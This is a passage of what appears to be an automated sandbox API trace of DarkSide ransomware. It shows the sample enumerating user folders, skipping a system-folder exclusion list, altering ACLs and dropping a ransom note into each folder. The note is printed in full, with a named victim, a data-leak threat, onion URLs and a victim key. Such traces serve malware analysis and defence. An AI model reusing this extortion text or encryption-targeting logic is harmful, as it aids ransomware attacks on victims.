_Str2="Users") returned -1 [0136.419] wcslen (_String="tor browser") returned 0xb [0136.419] _wcsicmp (_Str1="windows.old", _Str2="Users") returned 2 [0136.419] wcslen (_String="windows.old") returned 0xb [0136.419] _wcsicmp (_Str1="intel", _Str2="Users") returned -12 [0136.419] wcslen (_String="intel") returned 0x5 [0136.419] _wcsicmp (_Str1="msocache", _Str2="Users") returned -8 [0136.419] wcslen (_String="msocache") returned 0x8 [0136.419] _wcsicmp (_Str1="perflogs", _Str2="Users") returned -5 [0136.419] wcslen (_String="perflogs") returned 0x8 [0136.419] _wcsicmp (_Str1="x64dbg", _Str2="Users") returned 3 [0136.419] wcslen (_String="x64dbg") returned 0x6 [0136.419] _wcsicmp (_Str1="public", _Str2="Users") returned -5 [0136.419] wcslen (_String="public") returned 0x6 [0136.419] _wcsicmp (_Str1="all users", _Str2="Users") returned -20 [0136.419] wcslen (_String="all users") returned 0x9 [0136.419] _wcsicmp (_Str1="default", _Str2="Users") returned -17 [0136.420] wcslen (_String="default") returned 0x7 [0136.420] wcscpy (in: _Dest=0x2dd4d50, _Source="\\\\?\\C:\\*" | out: _Dest="\\\\?\\C:\\*") returned="\\\\?\\C:\\*" [0136.420] wcslen (_String="\\\\?\\C:\\*") returned 0x8 [0136.420] wcscpy (in: _Dest=0x2dd4d5e, _Source="Users" | out: _Dest="Users") returned="Users" [0136.420] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x2df4d60 [0136.420] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x2e04d68 [0136.420] wcscpy (in: _Dest=0x2df4d60, _Source="\\\\?\\C:\\Users" | out: _Dest="\\\\?\\C:\\Users") returned="\\\\?\\C:\\Users" [0136.420] GetNamedSecurityInfoW () returned 0x0 [0136.420] SetEntriesInAclW () returned 0x0 [0136.420] SetNamedSecurityInfoW () returned 0x0 [0138.979] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x50d700) returned 1 [0138.979] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3fefbc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0138.979] SetCurrentDirectoryW (lpPathName="\\\\?\\C:\\Users" (normalized: "c:\\users")) returned 1 [0138.979] strlen (_Str="----------- [ Welcome to DarkSide ] -------------> \r\n \r\n What happend? \r\n ---------------------------------------------- \r\n Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data. \r\n But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network. \r\n Follow our instructions below and you will recover all your data. \r\n \r\n Data Leak \r\n ---------------------------------------------- \r\n Dear Isolved, pay close attention to this message because it is very important. When penetrating your network, there was a global data leak from your servers. More 350Gb of DATA. Except that your network was fully encrypted. \r\n We have all the most important data from all your servers: Bases, E-mails, Accounting, Finance. If you do not get in touch within 72 hours, information about this incident will be posted on our blog, which is monitored by leading media in the U.S. and the world. \r\n \r\n Blog URL \r\n ---------------------------------------------- \r\n http://darksidedxcftmqa.onion/isolved/OLVrV9bQny0XcUSkk8y6cvFWox_2cRFUiz95xG-hYGKETYuH1rlnl2d5exhQ0jHu \r\n \r\n What guarantees? \r\n ---------------------------------------------- \r\n We value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our interests. \r\n All our decryption software is perfectly tested and will decrypt your data. We will also provide support in case of problems. \r\n We guarantee to decrypt one file for free. Go to the site and contact us. \r\n \r\n How to get access on website? \r\n ---------------------------------------------- \r\n Using a TOR browser: \r\n 1) Download and install TOR browser from this site: https://torproject.org/ \r\n 2) Open our website: http://darksidfqzcuhtk2.onion/AZHT20L23HCABE7V5FLPMR50Y0LPCNWKLICOH3MP156YR8DTFJGUE935ZG0QYCT6 \r\n \r\n When you open our website, put the following data in the input form: \r\n Key: \r\n \r\n MDwY2fJ0wMOMksG1GCvkBclFQNBOoNOtoKM1UfDyDwuobpBZwC5VSc9Y3cd130WLEVnipGp6jBFSvhWyVQsa0J0ICcDu9ihtUQ5yYCtSPNWu0XNtNwXchonPQ0iMpRO0leoAYPOeLNbBNkz7xlWPAOBMSBKpVQn1if08n0xBOpY7xC8J9BFmbbkZutVMbLqVqGzF8Q31iGOIDpONYRDC6KQ1fZMZhHIiGXStZG8NtnZYvQQ94XKRhCuhWNfNh1SmyM0YPNMVAnslDpZLmveZmB1vNxinwAlMJj67lVkjwXQRdcRiemxRpX7gIx6zbuvkqtdYIBo1q3neaVNLyLxogP8b50tKxc0Uok1lxDfTsZ61wmNhbJiyh1FXvjgZGrvEuR2SGm5to0K6fIA8GIA8Viu2AhxUOafNcYSKXckS5hq0zYOXnITkTJFvStKKSOLzp39sYyPYmDkyIPPQUTGsoqCIti0Sb2BQFTGkQQeqvnhdTJZfzVKGobFXx0b2aWi1yYavjfLdOdVzVQJIVyeOYe610BOT4L4fRpO38eiAcwKuS1eRwskD2jP \r\n \r\n !!! DANGER !!! \r\n DO NOT MODIFY or try to RECOVER any files yourself. We WILL NOT be able to RESTORE them. \r\n !!! DANGER !!!") returned 0xa8f [0138.979] CreateFileW (lpFileName="README.c06622a1.TXT" (normalized: "c:\\users\\readme.c06622a1.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c [0138.980] WriteFile (in: hFile=0x1c, lpBuffer=0x514f30*, nNumberOfBytesToWrite=0xa8f, lpNumberOfBytesWritten=0x3fef8c, lpOverlapped=0x0 | out: lpBuffer=0x514f30*, lpNumberOfBytesWritten=0x3fef8c*=0xa8f, lpOverlapped=0x0) returned 1 [0138.980] CloseHandle (hObject=0x1c) returned 1 [0138.981] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0138.981] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users" (normalized: "c:\\users")) returned 0x11 [0138.981] PathAddBackslashW (in: pszPath="\\\\?\\C:\\Users" | out: pszPath="\\\\?\\C:\\Users\\") returned="" [0138.981] wcslen (_String="\\\\?\\C:\\Users\\") returned 0xd [0138.981] FindFirstFileExW (in: lpFileName="\\\\?\\C:\\Users\\*", fInfoLevelId=0x0, lpFindFileData=0x3ff1ec, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3ff1ec) returned 0x2db8640 [0138.981] FindNextFileW (in: hFindFile=0x2db8640, lpFindFileData=0x3ff1ec | out: lpFindFileData=0x3ff1ec*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xd17a0380, ftLastAccessTime.dwHighDateTime=0x1d6f256, ftLastWriteTime.dwLowDateTime=0xd17a0380, ftLastWriteTime.dwHighDateTime=0x1d6f256, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0138.982] FindNextFileW (in: hFindFile=0x2db8640, lpFindFileData=0x3ff1ec | out: lpFindFileData=0x3ff1ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 1 [0138.982] _wcsicmp (_Str1="$recycle.bin", _Str2="5p5NrGJn0jS HALPmcxz") returned -17 [0138.982] wcslen (_String="$recycle.bin") returned 0xc [0138.982] _wcsicmp (_Str1="config.msi", _Str2="5p5NrGJn0jS HALPmcxz") returned 46 [0138.982] wcslen (_String="config.msi") returned 0xa [0138.982] _wcsicmp (_Str1="$windows.~bt", _Str2="5p5NrGJn0jS HALPmcxz") returned -17 [0138.982] wcslen (_String="$windows.~bt") returned 0xc [0138.982] _wcsicmp (_Str1="$windows.~ws", _Str2="5p5NrGJn0jS HALPmcxz") returned -17 [0138.982] wcslen (_String="$windows.~ws") returned 0xc [0138.982] _wcsicmp (_Str1="windows", _Str2="5p5NrGJn0jS HALPmcxz") returned 66 [0138.982] wcslen (_String="windows") returned 0x7 [0138.982] _wcsicmp (_Str1="appdata", _Str2="5p5NrGJn0jS HALPmcxz") returned 44 [0138.982] wcslen (_String="appdata") returned 0x7 [0138.982] _wcsicmp (_Str1="application data", _Str2="5p5NrGJn0jS HALPmcxz") returned 44 [0138.982] wcslen (_String="application data") returned 0x10 [0138.982] _wcsicmp (_Str1="boot", _Str2="5p5NrGJn0jS HALPmcxz") returned 45 [0138.982] wcslen (_String="boot") returned 0x4 [0138.982] _wcsicmp (_Str1="google", _Str2="5p5NrGJn0jS HALPmcxz") returned 50 [0138.982] wcslen (_String="google") returned 0x6 [0138.982] _wcsicmp (_Str1="mozilla", _Str2="5p5NrGJn0jS HALPmcxz") returned 56 [0138.982] wcslen (_String="mozilla") returned 0x7 [0138.982] _wcsicmp (_Str1="program files", _Str2="5p5NrGJn0jS HALPmcxz") returned 59 [0138.982] wcslen (_String="program files") returned 0xd [0138.982] _wcsicmp (_Str1="program files (x86)", _Str2="5p5NrGJn0jS HALPmcxz") returned 59 [0138.982] wcslen (_String="program files (x86)") returned 0x13 [0138.982] _wcsicmp (_Str1="programdata", _Str2="5p5NrGJn0jS HALPmcxz") returned 59 [0138.982] wcslen (_String="programdata") returned 0xb [0138.982] _wcsicmp (_Str1="system volume information", _Str2="5p5NrGJn0jS HALPmcxz") returned 62 [0138.982] wcslen (_String="system volume information") returned 0x19 [0138.982] _wcsicmp (_Str1="tor browser", _Str2="5p5NrGJn0jS HALPmcxz") returned 63 [0138.982] wcslen (_String="tor browser") returned 0xb [0138.982] _wcsicmp (_Str1="windows.old", _Str2="5p5NrGJn0jS HALPmcxz") returned 66 [0138.982] wcslen (_String="windows.old") returned 0xb [0138.982] _wcsicmp (_Str1="intel", _Str2="5p5NrGJn0jS HALPmcxz") returned 52 [0138.982] wcslen (_String="intel") returned 0x5 [0138.982] _wcsicmp (_Str1="msocache", _Str2="5p5NrGJn0jS HALPmcxz") returned 56 [0138.982] wcslen (_String="msocache") returned 0x8 [0138.982] _wcsicmp (_Str1="perflogs", _Str2="5p5NrGJn0jS HALPmcxz") returned 59 [0138.983] wcslen (_String="perflogs") returned 0x8 [0138.983] _wcsicmp (_Str1="x64dbg", _Str2="5p5NrGJn0jS HALPmcxz") returned 67 [0138.983] wcslen (_String="x64dbg") returned 0x6 [0138.983] _wcsicmp (_Str1="public", _Str2="5p5NrGJn0jS HALPmcxz") returned 59 [0138.983] wcslen (_String="public") returned 0x6 [0138.983] _wcsicmp (_Str1="all users", _Str2="5p5NrGJn0jS HALPmcxz") returned 44 [0138.983] wcslen (_String="all users") returned 0x9 [0138.983] _wcsicmp (_Str1="default", _Str2="5p5NrGJn0jS HALPmcxz") returned 47 [0138.983] wcslen (_String="default") returned 0x7 [0138.983] wcscpy (in: _Dest=0x2e04d68, _Source="\\\\?\\C:\\Users\\*" | out: _Dest="\\\\?\\C:\\Users\\*") returned="\\\\?\\C:\\Users\\*" [0138.983] wcslen (_String="\\\\?\\C:\\Users\\*") returned 0xe [0138.983] wcscpy (in: _Dest=0x2e04d82, _Source="5p5NrGJn0jS HALPmcxz" | out: _Dest="5p5NrGJn0jS HALPmcxz") returned="5p5NrGJn0jS HALPmcxz" [0138.983] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x4470048 [0138.983] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x4480050 [0138.984] wcscpy (in: _Dest=0x4470048, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz" [0138.984] GetNamedSecurityInfoW () returned 0x0 [0138.985] SetEntriesInAclW () returned 0x0 [0138.985] SetNamedSecurityInfoW () returned 0x0 [0147.345] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x2d7d268) returned 1 [0147.345] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3fed3c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0147.345] SetCurrentDirectoryW (lpPathName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz")) returned 1 [0147.346] strlen (_Str="----------- [ Welcome to DarkSide ] -------------> \r\n \r\n What happend? \r\n ---------------------------------------------- \r\n Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data. \r\n But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network. \r\n Follow our instructions below and you will recover all your data. \r\n \r\n Data Leak \r\n ---------------------------------------------- \r\n Dear Isolved, pay close attention to this message because it is very important. When penetrating your network, there was a global data leak from your servers. More 350Gb of DATA. Except that your network was fully encrypted. \r\n We have all the most important data from all your servers: Bases, E-mails, Accounting, Finance. If you do not get in touch within 72 hours, information about this incident will be posted on our blog, which is monitored by leading media in the U.S. and the world. \r\n \r\n Blog URL \r\n ---------------------------------------------- \r\n http://darksidedxcftmqa.onion/isolved/OLVrV9bQny0XcUSkk8y6cvFWox_2cRFUiz95xG-hYGKETYuH1rlnl2d5exhQ0jHu \r\n \r\n What guarantees? \r\n ---------------------------------------------- \r\n We value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our interests. \r\n All our decryption software is perfectly tested and will decrypt your data. We will also provide support in case of problems. \r\n We guarantee to decrypt one file for free. Go to the site and contact us. \r\n \r\n How to get access on website? \r\n ---------------------------------------------- \r\n Using a TOR browser: \r\n 1) Download and install TOR browser from this site: https://torproject.org/ \r\n 2) Open our website: http://darksidfqzcuhtk2.onion/AZHT20L23HCABE7V5FLPMR50Y0LPCNWKLICOH3MP156YR8DTFJGUE935ZG0QYCT6 \r\n \r\n When you open our website, put the following data in the input form: \r\n Key: \r\n \r\n MDwY2fJ0wMOMksG1GCvkBclFQNBOoNOtoKM1UfDyDwuobpBZwC5VSc9Y3cd130WLEVnipGp6jBFSvhWyVQsa0J0ICcDu9ihtUQ5yYCtSPNWu0XNtNwXchonPQ0iMpRO0leoAYPOeLNbBNkz7xlWPAOBMSBKpVQn1if08n0xBOpY7xC8J9BFmbbkZutVMbLqVqGzF8Q31iGOIDpONYRDC6KQ1fZMZhHIiGXStZG8NtnZYvQQ94XKRhCuhWNfNh1SmyM0YPNMVAnslDpZLmveZmB1vNxinwAlMJj67lVkjwXQRdcRiemxRpX7gIx6zbuvkqtdYIBo1q3neaVNLyLxogP8b50tKxc0Uok1lxDfTsZ61wmNhbJiyh1FXvjgZGrvEuR2SGm5to0K6fIA8GIA8Viu2AhxUOafNcYSKXckS5hq0zYOXnITkTJFvStKKSOLzp39sYyPYmDkyIPPQUTGsoqCIti0Sb2BQFTGkQQeqvnhdTJZfzVKGobFXx0b2aWi1yYavjfLdOdVzVQJIVyeOYe610BOT4L4fRpO38eiAcwKuS1eRwskD2jP \r\n \r\n !!! DANGER !!! \r\n DO NOT MODIFY or try to RECOVER any files yourself. We WILL NOT be able to RESTORE them. \r\n !!! DANGER !!!") returned 0xa8f [0147.346] CreateFileW (lpFileName="README.c06622a1.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\readme.c06622a1.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c [0147.346] WriteFile (in: hFile=0x1c, lpBuffer=0x514f30*, nNumberOfBytesToWrite=0xa8f, lpNumberOfBytesWritten=0x3fed0c, lpOverlapped=0x0 | out: lpBuffer=0x514f30*, lpNumberOfBytesWritten=0x3fed0c*=0xa8f, lpOverlapped=0x0) returned 1 [0147.347] CloseHandle (hObject=0x1c) returned 1 [0147.347] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0147.347] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz")) returned 0x10 [0147.348] PathAddBackslashW (in: pszPath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz" | out: pszPath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="" [0147.348] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned 0x22 [0147.348] FindFirstFileExW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*", fInfoLevelId=0x0, lpFindFileData=0x3fef6c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3fef6c) returned 0x2db8700 [0147.348] FindNextFileW (in: hFindFile=0x2db8700, lpFindFileData=0x3fef6c | out: lpFindFileData=0x3fef6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd67121c0, ftLastAccessTime.dwHighDateTime=0x1d6f256, ftLastWriteTime.dwLowDateTime=0xd67121c0, ftLastWriteTime.dwHighDateTime=0x1d6f256, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0147.348] FindNextFileW (in: hFindFile=0x2db8700, lpFindFileData=0x3fef6c | out: lpFindFileData=0x3fef6c*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppData", cAlternateFileName="")) returned 1 [0147.349] _wcsicmp (_Str1="$recycle.bin", _Str2="AppData") returned -61 [0147.349] wcslen (_String="$recycle.bin") returned 0xc [0147.349] _wcsicmp (_Str1="config.msi", _Str2="AppData") returned 2 [0147.349] wcslen (_String="config.msi") returned 0xa [0147.349] _wcsicmp (_Str1="$windows.~bt", _Str2="AppData") returned -61 [0147.349] wcslen (_String="$windows.~bt") returned 0xc [0147.349] _wcsicmp (_Str1="$windows.~ws", _Str2="AppData") returned -61 [0147.349] wcslen (_String="$windows.~ws") returned 0xc [0147.349] _wcsicmp (_Str1="windows", _Str2="AppData") returned 22 [0147.349] wcslen (_String="windows") returned 0x7 [0147.349] _wcsicmp (_Str1="appdata", _Str2="AppData") returned 0 [0147.349] FindNextFileW (in: hFindFile=0x2db8700, lpFindFileData=0x3fef6c | out: lpFindFileData=0x3fef6c*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29103b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29103b60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29103b60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Application Data", cAlternateFileName="APPLIC~1")) returned 1 [0147.349] FindNextFileW (in: hFindFile=0x2db8700, lpFindFileData=0x3fef6c | out: lpFindFileData=0x3fef6c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Contacts", cAlternateFileName="")) returned 1 [0147.349] _wcsicmp (_Str1="$recycle.bin", _Str2="Contacts") returned -63 [0147.349] wcslen (_String="$recycle.bin") returned 0xc [0147.349] _wcsicmp (_Str1="config.msi", _Str2="Contacts") returned -14 [0147.349] wcslen (_String="config.msi") returned 0xa [0147.349] _wcsicmp (_Str1="$windows.~bt", _Str2="Contacts") returned -63 [0147.349] wcslen (_String="$windows.~bt") returned 0xc [0147.349] _wcsicmp (_Str1="$windows.~ws", _Str2="Contacts") returned -63 [0147.349] wcslen (_String="$windows.~ws") returned 0xc [0147.349] _wcsicmp (_Str1="windows", _Str2="Contacts") returned 20 [0147.349] wcslen (_String="windows") returned 0x7 [0147.349] _wcsicmp (_Str1="appdata", _Str2="Contacts") returned -2 [0147.349] wcslen (_String="appdata") returned 0x7 [0147.349] _wcsicmp (_Str1="application data", _Str2="Contacts") returned -2 [0147.349] wcslen (_String="application data") returned 0x10 [0147.349] _wcsicmp (_Str1="boot", _Str2="Contacts") returned -1 [0147.349] wcslen (_String="boot") returned 0x4 [0147.349] _wcsicmp (_Str1="google", _Str2="Contacts") returned 4 [0147.349] wcslen (_String="google") returned 0x6 [0147.349] _wcsicmp (_Str1="mozilla", _Str2="Contacts") returned 10 [0147.349] wcslen (_String="mozilla") returned 0x7 [0147.349] _wcsicmp (_Str1="program files", _Str2="Contacts") returned 13 [0147.349] wcslen (_String="program files") returned 0xd [0147.349] _wcsicmp (_Str1="program files (x86)", _Str2="Contacts") returned 13 [0147.349] wcslen (_String="program files (x86)") returned 0x13 [0147.350] _wcsicmp (_Str1="programdata", _Str2="Contacts") returned 13 [0147.350] wcslen (_String="programdata") returned 0xb [0147.350] _wcsicmp (_Str1="system volume information", _Str2="Contacts") returned 16 [0147.350] wcslen (_String="system volume information") returned 0x19 [0147.350] _wcsicmp (_Str1="tor browser", _Str2="Contacts") returned 17 [0147.350] wcslen (_String="tor browser") returned 0xb [0147.350] _wcsicmp (_Str1="windows.old", _Str2="Contacts") returned 20 [0147.350] wcslen (_String="windows.old") returned 0xb [0147.350] _wcsicmp (_Str1="intel", _Str2="Contacts") returned 6 [0147.350] wcslen (_String="intel") returned 0x5 [0147.350] _wcsicmp (_Str1="msocache", _Str2="Contacts") returned 10 [0147.350] wcslen (_String="msocache") returned 0x8 [0147.350] _wcsicmp (_Str1="perflogs", _Str2="Contacts") returned 13 [0147.350] wcslen (_String="perflogs") returned 0x8 [0147.350] _wcsicmp (_Str1="x64dbg", _Str2="Contacts") returned 21 [0147.350] wcslen (_String="x64dbg") returned 0x6 [0147.350] _wcsicmp (_Str1="public", _Str2="Contacts") returned 13 [0147.350] wcslen (_String="public") returned 0x6 [0147.350] _wcsicmp (_Str1="all users", _Str2="Contacts") returned -2 [0147.350] wcslen (_String="all users") returned 0x9 [0147.350] _wcsicmp (_Str1="default", _Str2="Contacts") returned 1 [0147.350] wcslen (_String="default") returned 0x7 [0147.350] wcscpy (in: _Dest=0x4480050, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*" [0147.350] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*") returned 0x23 [0147.350] wcscpy (in: _Dest=0x4480094, _Source="Contacts" | out: _Dest="Contacts") returned="Contacts" [0147.350] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x44a0060 [0147.350] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x44b0068 [0147.351] wcscpy (in: _Dest=0x44a0060, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts" [0147.351] GetNamedSecurityInfoW () returned 0x0 [0147.352] SetEntriesInAclW () returned 0x0 [0147.352] SetNamedSecurityInfoW () returned 0x0 [0147.356] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x2d56ed8) returned 1 [0147.356] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3feabc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0147.356] SetCurrentDirectoryW (lpPathName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts")) returned 1 [0147.356] strlen (_Str="----------- [ Welcome to DarkSide ] -------------> \r\n \r\n What happend? \r\n ---------------------------------------------- \r\n Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data. \r\n But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network. \r\n Follow our instructions below and you will recover all your data. \r\n \r\n Data Leak \r\n ---------------------------------------------- \r\n Dear Isolved, pay close attention to this message because it is very important. When penetrating your network, there was a global data leak from your servers. More 350Gb of DATA. Except that your network was fully encrypted. \r\n We have all the most important data from all your servers: Bases, E-mails, Accounting, Finance. If you do not get in touch within 72 hours, information about this incident will be posted on our blog, which is monitored by leading media in the U.S. and the world. \r\n \r\n Blog URL \r\n ---------------------------------------------- \r\n http://darksidedxcftmqa.onion/isolved/OLVrV9bQny0XcUSkk8y6cvFWox_2cRFUiz95xG-hYGKETYuH1rlnl2d5exhQ0jHu \r\n \r\n What guarantees? \r\n ---------------------------------------------- \r\n We value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our interests. \r\n All our decryption software is perfectly tested and will decrypt your data. We will also provide support in case of problems. \r\n We guarantee to decrypt one file for free. Go to the site and contact us. \r\n \r\n How to get access on website? \r\n ---------------------------------------------- \r\n Using a TOR browser: \r\n 1) Download and install TOR browser from this site: https://torproject.org/ \r\n 2) Open our website: http://darksidfqzcuhtk2.onion/AZHT20L23HCABE7V5FLPMR50Y0LPCNWKLICOH3MP156YR8DTFJGUE935ZG0QYCT6 \r\n \r\n When you open our website, put the following data in the input form: \r\n Key: \r\n \r\n MDwY2fJ0wMOMksG1GCvkBclFQNBOoNOtoKM1UfDyDwuobpBZwC5VSc9Y3cd130WLEVnipGp6jBFSvhWyVQsa0J0ICcDu9ihtUQ5yYCtSPNWu0XNtNwXchonPQ0iMpRO0leoAYPOeLNbBNkz7xlWPAOBMSBKpVQn1if08n0xBOpY7xC8J9BFmbbkZutVMbLqVqGzF8Q31iGOIDpONYRDC6KQ1fZMZhHIiGXStZG8NtnZYvQQ94XKRhCuhWNfNh1SmyM0YPNMVAnslDpZLmveZmB1vNxinwAlMJj67lVkjwXQRdcRiemxRpX7gIx6zbuvkqtdYIBo1q3neaVNLyLxogP8b50tKxc0Uok1lxDfTsZ61wmNhbJiyh1FXvjgZGrvEuR2SGm5to0K6fIA8GIA8Viu2AhxUOafNcYSKXckS5hq0zYOXnITkTJFvStKKSOLzp39sYyPYmDkyIPPQUTGsoqCIti0Sb2BQFTGkQQeqvnhdTJZfzVKGobFXx0b2aWi1yYavjfLdOdVzVQJIVyeOYe610BOT4L4fRpO38eiAcwKuS1eRwskD2jP \r\n \r\n !!! DANGER !!! \r\n DO NOT MODIFY or try to RECOVER any files yourself. We WILL NOT be able to RESTORE them. \r\n !!! DANGER !!!") returned 0xa8f [0147.356] CreateFileW (lpFileName="README.c06622a1.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\readme.c06622a1.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c [0147.357] WriteFile (in: hFile=0x1c, lpBuffer=0x514f30*, nNumberOfBytesToWrite=0xa8f, lpNumberOfBytesWritten=0x3fea8c, lpOverlapped=0x0 | out: lpBuffer=0x514f30*, lpNumberOfBytesWritten=0x3fea8c*=0xa8f, lpOverlapped=0x0) returned 1 [0147.358] CloseHandle (hObject=0x1c) returned 1 [0147.358] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0147.358] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts")) returned 0x11 [0147.358] PathAddBackslashW (in: pszPath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts" | out: pszPath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\") returned="" [0147.358] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\") returned 0x2b [0147.358] FindFirstFileExW (in: 